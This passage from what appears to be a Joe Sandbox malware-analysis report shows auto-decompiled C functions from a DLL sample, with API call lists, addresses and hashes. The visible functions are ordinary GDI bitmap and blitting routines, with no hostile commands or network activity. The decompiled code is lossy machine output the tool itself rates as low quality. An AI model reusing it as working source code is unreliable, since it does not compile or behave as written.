						SelectObject(_v20, _v28);
					}
					DeleteObject(_v24);
					_pop(_t169);
					 *[fs:eax] = _t169;
					_push(E0072159F);
					if(_v40 != 0) {
						_push(0);
						_push(_v40);
						_push(_v20);
						L007066F0();
					}
					return DeleteDC(_v20);
				} else {
					_push(1);
					_push(1);
					_push(_a32);
					L00706588();
					_v24 = E00721174(_a32);
					_v24 = SelectObject(_a12, _v24);
					_push(_t177);
					_push(0x7213eb);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					MaskBlt(_t173, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00706CCC(0xaa0029, 0xcc0020));
					_pop(_t171);
					 *[fs:eax] = _t171;
					_push(E0072159F);
					_v24 = SelectObject(_a12, _v24);
					return DeleteObject(_v24);
				}
			}

0x00721319
0x0072131b
0x00721321
0x00721324
0x00721327
0x00721329
0x0072132c
0x0072132f
0x00721333
0x0072133b
0x007213f4
0x007213f7
0x007213f9
0x00721403
0x00721408
0x00721409
0x0072140e
0x00721411
0x00721414
0x00721415
0x00721419
0x0072141a
0x00721424
0x00721434
0x00721437
0x00721439
0x0072143e
0x0072143f
0x00721442
0x00721443
0x00721448
0x0072144b
0x00721450
0x00721454
0x00721455
0x0072145e
0x00721474
0x00721476
0x0072147b
0x0072147c
0x0072147f
0x00721480
0x00721485
0x00721460
0x00721460
0x00721465
0x00721466
0x00721469
0x0072146a
0x0072146f
0x0072146f
0x0072148b
0x0072148c
0x007214ae
0x007214d0
0x007214dd
0x007214eb
0x00721512
0x00721537
0x00721541
0x0072154b
0x00721554
0x0072155e
0x0072155e
0x00721567
0x0072156e
0x00721571
0x00721574
0x0072157d
0x0072157f
0x00721584
0x00721588
0x00721589
0x00721589
0x00721597
0x00721353
0x00721353
0x00721355
0x0072135a
0x0072135b
0x00721365
0x00721375
0x0072137a
0x0072137b
0x00721380
0x00721383
0x007213bf
0x007213c6
0x007213c9
0x007213cc
0x007213de
0x007213ea
0x007213ea

APIs

7378A520.GDI32(?,00000001,00000001), ref: 0072135B
SelectObject.GDI32(?,?), ref: 00721370
MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,007213EB,?,?), ref: 007213BF
SelectObject.GDI32(?,?), ref: 007213D9
DeleteObject.GDI32(?), ref: 007213E5
7378A590.GDI32(00000000), ref: 007213F9
7378A520.GDI32(?,?,?,00000000,00721598,?,00000000), ref: 0072141A
SelectObject.GDI32(?,?), ref: 0072142F
7378B410.GDI32(?,5E0805C0,00000000,?,?,?,?,?,00000000,00721598,?,00000000), ref: 00721443
7378B410.GDI32(?,?,00000000,?,5E0805C0,00000000,?,?,?,?,?,00000000,00721598,?,00000000), ref: 00721455
7378B410.GDI32(?,00000000,000000FF,?,?,00000000,?,5E0805C0,00000000,?,?,?,?,?,00000000,00721598), ref: 0072146A
7378B410.GDI32(?,5E0805C0,000000FF,?,?,00000000,?,5E0805C0,00000000,?,?,?,?,?,00000000,00721598), ref: 00721480
7378B150.GDI32(?,?,5E0805C0,000000FF,?,?,00000000,?,5E0805C0,00000000,?,?,?,?,?,00000000), ref: 0072148C
StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 007214AE
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 007214D0
SetTextColor.GDI32(?,00000000), ref: 007214D8
SetBkColor.GDI32(?,00FFFFFF), ref: 007214E6
StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 00721512
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00721537
SetTextColor.GDI32(?,?), ref: 00721541
SetBkColor.GDI32(?,?), ref: 0072154B
SelectObject.GDI32(?,00000000), ref: 0072155E
DeleteObject.GDI32(?), ref: 00721567
7378B410.GDI32(?,00000000,00000000,0072159F,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 00721589
DeleteDC.GDI32(?), ref: 00721592

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: 7378$Object$B410$ColorSelectStretch$Delete$A520Text$A590B150Mask
String ID:
API String ID: 2689844912-0
Opcode ID: 3bcf9c6bb25efa16fe9f2db5d48c7f1f83c9064478d43867dbc0f454e902a4d2
Instruction ID: 91acccd2561b2d6da5bebbfcc9f3691311159725bbfcbb9750009b7c41880bb9
Opcode Fuzzy Hash: 3bcf9c6bb25efa16fe9f2db5d48c7f1f83c9064478d43867dbc0f454e902a4d2
Instruction Fuzzy Hash: 1481BEB1A00219EFDB50EFA8CC95EAF77ECAB0D714F500654F618E7281C679ED108B61

Uniqueness

Uniqueness Score: -1.00%

Function 0072481C Relevance: 31.7, APIs: 21, Instructions: 194
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E0072481C(void* __eax, long __ecx, intOrPtr __edx) {
				void* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				char _v21;
				void* _v28;
				void* _v32;
				intOrPtr _v92;
				intOrPtr _v96;
				int _v108;
				int _v112;
				void _v116;
				void* _t64;
				int _t65;
				intOrPtr _t66;
				long _t77;
				void* _t107;
				intOrPtr _t116;
				intOrPtr _t117;
				long _t120;
				intOrPtr _t123;
				void* _t127;
				void* _t129;
				intOrPtr _t130;

				_t127 = _t129;
				_t130 = _t129 + 0xffffff90;
				_t120 = __ecx;
				_t123 = __edx;
				_t107 = __eax;
				_v8 = 0;
				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
					return _v8;
				} else {
					L00723D10(_t107);
					_v12 = 0;
					_v20 = 0;
					_push(_t127);
					_push(0x724a17);
					_push( *[fs:eax]);
					 *[fs:eax] = _t130;
					_push(0);
					L007068E8();
					_v12 = E00721174(0);
					_push(_v12);
					L00706590();
					_v20 = E00721174(_v12);
					_push(0);
					_push(1);
					_push(1);
					_push(_v108);
					_t64 = _v112;
					_push(_t64);
					L00706578();
					_v8 = _t64;
					if(_v8 == 0) {
						L17:
						_t65 = 0;
						_pop(_t116);
						 *[fs:eax] = _t116;
						_push(0x724a1e);
						if(_v20 != 0) {
							_t65 = DeleteDC(_v20);
						}
						if(_v12 != 0) {
							_t66 = _v12;
							_push(_t66);
							_push(0);
							L00706B28();
							return _t66;
						}
						return _t65;
					} else {
						_v32 = SelectObject(_v20, _v8);
						if(__ecx != 0x1fffffff) {
							_push(_v12);
							L00706590();
							_v16 = E00721174(_v12);
							_push(_t127);
							_push(0x7249cf);
							_push( *[fs:eax]);
							 *[fs:eax] = _t130;
							if(_v96 == 0) {
								_v21 = 0;
							} else {
								_v21 = 1;
								_v92 = 0;
								_t107 = E00724154(_t107, _t123, _t123, 0,  &_v116);
							}
							_v28 = SelectObject(_v16, _t107);
							if(_t123 != 0) {
								_push(0);
								_push(_t123);
								_push(_v16);
								L007066F0();
								_push(_v16);
								L007066C8();
								_push(0);
								_push(_t123);
								_push(_v20);
								L007066F0();
								_push(_v20);
								L007066C8();
							}
							_t77 = SetBkColor(_v16, _t120);
							_push(0xcc0020);
							_push(0);
							_push(0);
							_push(_v16);
							_push(_v108);
							_push(_v112);
							_push(0);
							_push(0);
							_push(_v20);
							L00706568();
							SetBkColor(_v16, _t77);
							if(_v28 != 0) {
								SelectObject(_v16, _v28);
							}
							if(_v21 != 0) {
								DeleteObject(_t107);
							}
							_pop(_t117);
							 *[fs:eax] = _t117;
							_push(0x7249d6);
							return DeleteDC(_v16);
						} else {
							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
							if(_v32 != 0) {
								SelectObject(_v20, _v32);
							}
							goto L17;
						}
					}
				}
			}

0x0072481d
0x0072481f
0x00724825
0x00724827
0x00724829
0x0072482d
0x00724832
0x00724a27
0x0072484c
0x0072484e
0x00724855
0x0072485a
0x0072485f
0x00724860
0x00724865
0x00724868
0x0072486b
0x0072486d
0x00724877
0x0072487d
0x0072487e
0x00724888
0x0072488b
0x0072488d
0x0072488f
0x00724894
0x00724895
0x00724898
0x00724899
0x0072489e
0x007248a5
0x007249e9
0x007249e9
0x007249eb
0x007249ee
0x007249f1
0x007249fa
0x00724a00
0x00724a00
0x00724a09
0x00724a0b
0x00724a0e
0x00724a0f
0x00724a11
0x00000000
0x00724a11
0x00724a16
0x007248ab
0x007248b8
0x007248c1
0x007248e2
0x007248e3
0x007248ed
0x007248f2
0x007248f3
0x007248f8
0x007248fb
0x00724902
0x00724922
0x00724904
0x00724904
0x0072490a
0x0072491e
0x0072491e
0x00724930
0x00724935
0x00724937
0x00724939
0x0072493d
0x0072493e
0x00724946
0x00724947
0x0072494c
0x0072494e
0x00724952
0x00724953
0x0072495b
0x0072495c
0x0072495c
0x00724966
0x0072496d
0x00724972
0x00724974
0x00724979
0x0072497d
0x00724981
0x00724982
0x00724984
0x00724989
0x0072498a
0x00724994
0x0072499d
0x007249a7
0x007249a7
0x007249b0
0x007249b3
0x007249b3
0x007249ba
0x007249bd
0x007249c0
0x007249ce
0x007248c3
0x007248d5
0x007249da
0x007249e4
0x007249e4
0x00000000
0x007249da
0x007248c1
0x007248a5

APIs

GetObjectA.GDI32(?,00000054,?), ref: 0072483F
7378AC50.USER32(00000000,00000000,00724A17,?,?,00000054,?), ref: 0072486D
7378A590.GDI32(?,00000000,00000000,00724A17,?,?,00000054,?), ref: 0072487E
7378A410.GDI32(?,?,00000001,00000001,00000000,?,00000000,00000000,00724A17,?,?,00000054,?), ref: 00724899
SelectObject.GDI32(?,00000000), ref: 007248B3
PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 007248D5
7378A590.GDI32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,00724A17,?,?,00000054,?), ref: 007248E3
SelectObject.GDI32(?), ref: 0072492B
7378B410.GDI32(?,?,00000000,?,?,00000000,007249CF,?,?,?,00000000,?,?,00000001,00000001,00000000), ref: 0072493E
7378B150.GDI32(?,?,?,00000000,?,?,00000000,007249CF,?,?,?,00000000,?,?,00000001,00000001), ref: 00724947
7378B410.GDI32(?,?,00000000,?,?,?,00000000,?,?,00000000,007249CF,?,?,?,00000000,?), ref: 00724953
7378B150.GDI32(?,?,?,00000000,?,?,?,00000000,?,?,00000000,007249CF,?,?,?,00000000), ref: 0072495C
SetBkColor.GDI32(?), ref: 00724966
737997E0.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,?,?,?,00000000,007249CF), ref: 0072498A
SetBkColor.GDI32(?,00000000), ref: 00724994
SelectObject.GDI32(?,00000000), ref: 007249A7
DeleteObject.GDI32 ref: 007249B3
DeleteDC.GDI32(?), ref: 007249C9
SelectObject.GDI32(?,00000000), ref: 007249E4
DeleteDC.GDI32(00000000), ref: 00724A00
7378B380.USER32(00000000,00000000,00724A1E,00000001,00000000,?,00000000,00000000,00724A17,?,?,00000054,?), ref: 00724A11

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: 7378$Object$Select$Delete$A590B150B410Color$737997A410B380
String ID:
API String ID: 2769308743-0
Opcode ID: 1ab774d7d16c5a6841a3ef504d0098e54dc3d0ab045306c63c1728a0f920de74
Instruction ID: 17b0aefe7df663a522b0538ab322f85c6cd63edb3184f4d71ea1523db86dc0f6
Opcode Fuzzy Hash: 1ab774d7d16c5a6841a3ef504d0098e54dc3d0ab045306c63c1728a0f920de74
Instruction Fuzzy Hash: 7E510CB5E40218EFDB10EBE8DC5AFAEB7FCAB09700F104565B614E72C1D679A950CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00725624 Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 351
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00725624(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				void* _v16;
				struct HDC__* _v20;
				char _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v37;
				intOrPtr _v44;
				void* _v48;
				struct HDC__* _v52;
				intOrPtr _v56;
				intOrPtr* _v60;
				intOrPtr* _v64;
				short _v66;
				short _v68;
				signed short _v70;
				signed short _v72;
				void* _v76;
				intOrPtr _v172;
				char _v174;
				intOrPtr _t150;
				signed int _t160;
				intOrPtr _t163;
				void* _t166;
				void* _t174;
				void* _t183;
				signed int _t188;
				intOrPtr _t189;
				struct HDC__* _t190;
				struct HDC__* _t204;
				signed int _t208;
				signed short _t214;
				intOrPtr _t241;
				intOrPtr* _t245;
				intOrPtr _t251;
				intOrPtr _t289;
				intOrPtr _t290;
				intOrPtr _t295;
				signed int _t297;
				signed int _t317;
				void* _t319;
				void* _t320;
				signed int _t321;
				void* _t322;
				void* _t323;
				void* _t324;
				intOrPtr _t325;

				_t316 = __edi;
				_t323 = _t324;
				_t325 = _t324 + 0xffffff54;
				_t319 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v52 = 0;
				_v44 = 0;
				_v60 = 0;
				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t322);
				_v37 = _v36 == 0xc;
				if(_v37 != 0) {
					_v36 = 0x28;
				}
				_v28 = E007026CC(_v36 + 0x40c);
				_v64 = _v28;
				_push(_t323);
				_push(0x725b41);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_push(_t323);
				_push(0x725b14);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				if(_v37 == 0) {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t320 = _t319 - _v36;
					_t150 =  *((intOrPtr*)(_v64 + 0x10));
					if(_t150 != 3 && _t150 != 0) {
						_v60 = E00703244(1);
						if(_a4 == 0) {
							E00702C80( &_v174, 0xe);
							_v174 = 0x4d42;
							_v172 = _v36 + _t320;
							_a4 =  &_v174;
						}
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						E00719144(_v60,  *_v60, _v12, _t316, _t320, _t320, 0);
						 *((intOrPtr*)( *_v60 + 0x14))();
						_v12 = _v60;
					}
				} else {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t251 = _v64;
					E00702C80(_t251, 0x28);
					_t241 = _t251;
					 *(_t241 + 4) = _v72 & 0x0000ffff;
					 *(_t241 + 8) = _v70 & 0x0000ffff;
					 *((short*)(_t241 + 0xc)) = _v68;
					 *((short*)(_t241 + 0xe)) = _v66;
					_t320 = _t319 - 0xc;
				}
				_t245 = _v64;
				 *_t245 = _v36;
				_v32 = _v28 + _v36;
				if( *((short*)(_t245 + 0xc)) != 1) {
					E00721054();
				}
				if(_v36 == 0x28) {
					_t214 =  *(_t245 + 0xe);
					if(_t214 == 0x10 || _t214 == 0x20) {
						if( *((intOrPtr*)(_t245 + 0x10)) == 3) {
							E007190D4(_v12, 0xc, _v32);
							_v32 = _v32 + 0xc;
							_t320 = _t320 - 0xc;
						}
					}
				}
				if( *(_t245 + 0x20) == 0) {
					 *(_t245 + 0x20) = E007212E4( *(_t245 + 0xe));
				}
				_t317 = _v37 & 0x000000ff;
				_t257 =  *(_t245 + 0x20) * 0;
				E007190D4(_v12,  *(_t245 + 0x20) * 0, _v32);
				_t321 = _t320 -  *(_t245 + 0x20) * 0;
				if( *(_t245 + 0x14) == 0) {
					_t297 =  *(_t245 + 0xe) & 0x0000ffff;
					_t208 = E00721304( *((intOrPtr*)(_t245 + 4)), 0x20, _t297);
					asm("cdq");
					_t257 = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
					 *(_t245 + 0x14) = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
				}
				_t160 =  *(_t245 + 0x14);
				if(_t321 > _t160) {
					_t321 = _t160;
				}
				if(_v37 != 0) {
					_t160 = E007215AC(_v32);
				}
				_push(0);
				L007068E8();
				_v16 = E00721174(_t160);
				_push(_t323);
				_push(0x725a8f);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_t163 =  *((intOrPtr*)(_v64 + 0x10));
				if(_t163 == 0 || _t163 == 3) {
					if( *0x76c460 == 0) {
						_push(0);
						_push("true");
						_push( &_v24);
						_push(0);
						_push(_v28);
						_t166 = _v16;
						_push(_t166);
						L00706598();
						_v44 = _t166;
						if(_v44 == 0 || _v24 == 0) {
							if(GetLastError() != 0) {
								E0070CDE4(_t245, _t257, _t317, _t321);
							} else {
								E00721054();
							}
						}
						_push(_t323);
						_push( *[fs:eax]);
						 *[fs:eax] = _t325;
						E007190D4(_v12, _t321, _v24);
						_pop(_t289);
						 *[fs:eax] = _t289;
						_t290 = 0x725a5e;
						 *[fs:eax] = _t290;
						_push(0x725a96);
						_t174 = _v16;
						_push(_t174);
						_push(0);
						L00706B28();
						return _t174;
					} else {
						goto L27;
					}
				} else {
					L27:
					_v20 = 0;
					_v24 = E007026CC(_t321);
					_push(_t323);
					_push(0x7259f7);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_t263 = _t321;
					E007190D4(_v12, _t321, _v24);
					_push(_v16);
					L00706590();
					_v20 = E00721174(_v16);
					_push(1);
					_push(1);
					_t183 = _v16;
					_push(_t183);
					L00706588();
					_v48 = SelectObject(_v20, _t183);
					_v56 = 0;
					_t188 =  *(_v64 + 0x20);
					if(_t188 > 0) {
						_t263 = _t188;
						_v52 = E00721864(0, _t188);
						_push(0);
						_push(_v52);
						_t204 = _v20;
						_push(_t204);
						L007066F0();
						_v56 = _t204;
						_push(_v20);
						L007066C8();
					}
					_push(_t323);
					_push(0x7259cb);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_push(0);
					_t189 = _v28;
					_push(_t189);
					_push(_v24);
					_push(4);
					_push(_t189);
					_t190 = _v20;
					_push(_t190);
					L007065A0();
					_v44 = _t190;
					if(_v44 == 0) {
						if(GetLastError() != 0) {
							E0070CDE4(_t245, _t263, _t317, _t321);
						} else {
							E00721054();
						}
					}
					_pop(_t295);
					 *[fs:eax] = _t295;
					_push(0x7259d2);
					if(_v56 != 0) {
						_push(0xffffffff);
						_push(_v56);
						_push(_v20);
						L007066F0();
					}
					return DeleteObject(SelectObject(_v20, _v48));
				}
			}

0x00725624
0x00725625
0x00725627
0x00725630
0x00725632
0x00725635
0x0072563a
0x0072563f
0x00725644
0x00725654
0x0072565b
0x00725663
0x00725665
0x00725665
0x0072567c
0x00725682
0x00725687
0x00725688
0x0072568d
0x00725690
0x00725695
0x00725696
0x0072569b
0x0072569e
0x007256a5
0x00725704
0x00725707
0x0072570d
0x00725713
0x0072572d
0x00725734
0x00725743
0x00725748
0x00725756
0x00725762
0x00725762
0x00725772
0x00725782
0x00725796
0x007257a5
0x007257b7
0x007257bd
0x007257bd
0x007256a7
0x007256b7
0x007256ba
0x007256c6
0x007256cb
0x007256d1
0x007256d8
0x007256df
0x007256e7
0x007256eb
0x007256eb
0x007257c0
0x007257c6
0x007257ce
0x007257d6
0x007257d8
0x007257d8
0x007257e1
0x007257e3
0x007257eb
0x007257f7
0x00725804
0x00725809
0x0072580d
0x0072580d
0x007257f7
0x007257eb
0x00725814
0x0072581f
0x0072581f
0x00725825
0x00725831
0x0072583a
0x0072584c
0x00725852
0x00725854
0x00725860
0x0072586a
0x0072586f
0x00725872
0x00725872
0x00725875
0x0072587a
0x0072587c
0x0072587c
0x00725882
0x00725887
0x00725887
0x0072588c
0x0072588e
0x00725898
0x0072589d
0x0072589e
0x007258a3
0x007258a6
0x007258ac
0x007258b1
0x007258bf
0x007259fe
0x00725a00
0x00725a05
0x00725a06
0x00725a0b
0x00725a0c
0x00725a0f
0x00725a10
0x00725a15
0x00725a1c
0x00725a2b
0x00725a34
0x00725a2d
0x00725a2d
0x00725a2d
0x00725a2b
0x00725a3b
0x00725a41
0x00725a44
0x00725a4f
0x00725a56
0x00725a59
0x00725a78
0x00725a7b
0x00725a7e
0x00725a83
0x00725a86
0x00725a87
0x00725a89
0x00725a8e
0x00000000
0x00000000
0x00000000
0x007258c5
0x007258c5
0x007258c7
0x007258d1
0x007258d6
0x007258d7
0x007258dc
0x007258df
0x007258e5
0x007258ea
0x007258f2
0x007258f3
0x007258fd
0x00725900
0x00725902
0x00725904
0x00725907
0x00725908
0x00725917
0x0072591c
0x00725922
0x00725927
0x00725929
0x00725935
0x00725938
0x0072593d
0x0072593e
0x00725941
0x00725942
0x00725947
0x0072594d
0x0072594e
0x0072594e
0x00725955
0x00725956
0x0072595b
0x0072595e
0x00725961
0x00725963
0x00725966
0x0072596a
0x0072596b
0x0072596d
0x0072596e
0x00725971
0x00725972
0x00725977
0x0072597e
0x00725987
0x00725990
0x00725989
0x00725989
0x00725989
0x00725987
0x00725997
0x0072599a
0x0072599d
0x007259a6
0x007259a8
0x007259ad
0x007259b1
0x007259b2
0x007259b2
0x007259ca
0x007259ca

APIs

7378AC50.USER32(00000000,?,00000000,00725B41,?,?), ref: 0072588E
7378A590.GDI32(00000001,00000000,007259F7,?,00000000,00725A8F,?,00000000,?,00000000,00725B41,?,?), ref: 007258F3
7378A520.GDI32(00000001,00000001,00000001,00000001,00000000,007259F7,?,00000000,00725A8F,?,00000000,?,00000000,00725B41,?,?), ref: 00725908
SelectObject.GDI32(?,00000000), ref: 00725912
7378B410.GDI32(?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,007259F7,?,00000000,00725A8F,?,00000000), ref: 00725942
7378B150.GDI32(?,?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,007259F7,?,00000000,00725A8F), ref: 0072594E
7378A7F0.GDI32(?,?,00000004,00000000,?,00000000,00000000,007259CB,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 00725972
GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,007259CB,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 00725980
7378B410.GDI32(?,00000000,000000FF,007259D2,00000000,?,00000000,00000000,007259CB,?,?,00000000,00000001,00000001,00000001,00000001), ref: 007259B2
SelectObject.GDI32(?,?), ref: 007259BF
DeleteObject.GDI32(00000000), ref: 007259C5

Strings

lTq, xrefs: 00725723
BM, xrefs: 00725748
(, xrefs: 007257DD

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: 7378$Object$B410Select$A520A590B150DeleteErrorLast
String ID: ($BM$lTq
API String ID: 929566397-33054541
Opcode ID: aea43f80664d761fe897b81811abec231ad0dd679a591929100ed8e026b6341e
Instruction ID: ac80f84b1be849bac8fbbc43bca72faca66ad8da368e4d14e6399bc6641ef05f
Opcode Fuzzy Hash: aea43f80664d761fe897b81811abec231ad0dd679a591929100ed8e026b6341e
Instruction Fuzzy Hash: 01D14874E00618DFDF14EFA8D899AAEBBF5FF48310F048565E904EB295D7389881CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00724D20 Relevance: 21.2, APIs: 14, Instructions: 217
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00724D20(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				void* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				intOrPtr _t78;
				struct HDC__* _t80;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				char _t85;
				void* _t92;
				struct HDC__* _t115;
				void* _t136;
				struct HDC__* _t160;
				intOrPtr* _t164;
				intOrPtr _t172;
				intOrPtr _t176;
				intOrPtr _t178;
				intOrPtr _t180;
				int* _t184;
				intOrPtr _t186;
				void* _t188;
				void* _t189;
				intOrPtr _t190;

				_t165 = __ecx;
				_t188 = _t189;
				_t190 = _t189 + 0xffffffe4;
				_t184 = __ecx;
				_v8 = __edx;
				_t164 = __eax;
				_t186 =  *((intOrPtr*)(__eax + 0x28));
				_t172 =  *0x724f6c; // 0xf
				E00720E50(_v8, __ecx, _t172);
				E0072539C(_t164);
				_v12 = 0;
				_v13 = 0;
				_t78 =  *((intOrPtr*)(_t186 + 0x10));
				if(_t78 != 0) {
					_push(0xffffffff);
					_push(_t78);
					_t160 =  *(_v8 + 4);
					_push(_t160);
					L007066F0();
					_v12 = _t160;
					_push( *(_v8 + 4));
					L007066C8();
					_v13 = 1;
				}
				_push(0xc);
				_t80 =  *(_v8 + 4);
				_push(_t80);
				L00706630();
				_push(_t80);
				_push(0xe);
				_t82 =  *(_v8 + 4);
				L00706630();
				_t83 = _t82;
				_t84 = _t83 * _t82;
				if(_t84 > 8) {
					L4:
					_t85 = 0;
				} else {
					_t165 =  *(_t186 + 0x28) & 0x0000ffff;
					if(_t84 < ( *(_t186 + 0x2a) & 0x0000ffff) * ( *(_t186 + 0x28) & 0x0000ffff)) {
						_t85 = 1;
					} else {
						goto L4;
					}
				}
				if(_t85 == 0) {
					if(E007250AC(_t164) == 0) {
						SetStretchBltMode(E00720D7C(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t188);
				_push(0x724f5c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t190;
				if( *((intOrPtr*)( *_t164 + 0x28))() != 0) {
					E0072533C(_t164, _t165);
				}
				_t92 = E00724FF0(_t164);
				_t176 =  *0x724f6c; // 0xf
				E00720E50(_t92, _t165, _t176);
				if( *((intOrPtr*)( *_t164 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t184, _t184[1], _t184[2] -  *_t184, _t184[3] - _t184[1],  *(E00724FF0(_t164) + 4), 0, 0,  *(_t186 + 0x1c),  *(_t186 + 0x20),  *(_v8 + 0x20));
					_pop(_t178);
					 *[fs:eax] = _t178;
					_push(0x724f63);
					if(_v13 != 0) {
						_push(0xffffffff);
						_push(_v12);
						_t115 =  *(_v8 + 4);
						_push(_t115);
						L007066F0();
						return _t115;
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t188);
					_push(0x724ef1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t190;
					L00706590();
					_v28 = E00721174(0);
					_v32 = SelectObject(_v28,  *(_t186 + 0xc));
					E00721318( *(_v8 + 4), _t164, _t184[1],  *_t184, _t184, _t186, 0, 0, _v28,  *(_t186 + 0x20),  *(_t186 + 0x1c), 0, 0,  *(E00724FF0(_t164) + 4), _t184[3] - _t184[1], _t184[2] -  *_t184);
					_t136 = 0;
					_t180 = 0;
					 *[fs:eax] = _t180;
					_push(0x724f36);
					if(_v32 != 0) {
						_t136 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t136;
				}
			}

0x00724d20
0x00724d21
0x00724d23
0x00724d29
0x00724d2b
0x00724d2e
0x00724d30
0x00724d33
0x00724d3c
0x00724d43
0x00724d4a
0x00724d4d
0x00724d51
0x00724d56
0x00724d58
0x00724d5a
0x00724d5e
0x00724d61
0x00724d62
0x00724d67
0x00724d70
0x00724d71
0x00724d76
0x00724d76
0x00724d7a
0x00724d7f
0x00724d82
0x00724d83
0x00724d88
0x00724d89
0x00724d8e
0x00724d92
0x00724d99
0x00724d9a
0x00724d9f
0x00724db0
0x00724db0
0x00724da1
0x00724da5
0x00724dae
0x00724db4
0x00000000
0x00000000
0x00000000
0x00724dae
0x00724db8
0x00724dfb
0x00724e08
0x00724e08
0x00724dba
0x00724dc5
0x00724dd3
0x00724deb
0x00724deb
0x00724e0f
0x00724e10
0x00724e15
0x00724e18
0x00724e24
0x00724e28
0x00724e28
0x00724e2f
0x00724e34
0x00724e3a
0x00724e48
0x00724f31
0x00724f38
0x00724f3b
0x00724f3e
0x00724f47
0x00724f49
0x00724f4e
0x00724f52
0x00724f55
0x00724f56
0x00000000
0x00724f56
0x00724f5b
0x00724e4e
0x00724e50
0x00724e55
0x00724e5a
0x00724e5b
0x00724e60
0x00724e63
0x00724e68
0x00724e72
0x00724e82
0x00724ebc
0x00724ec1
0x00724ec3
0x00724ec6
0x00724ec9
0x00724ed2
0x00724edc
0x00724edc
0x00724ee5
0x00000000
0x00724eeb
0x00724ef0
0x00724ef0

APIs

Part of subcall function 0072539C: 7378AC50.USER32(00000000,?,?,?,?,00723EE7,00000000,00723F73), ref: 007253F2
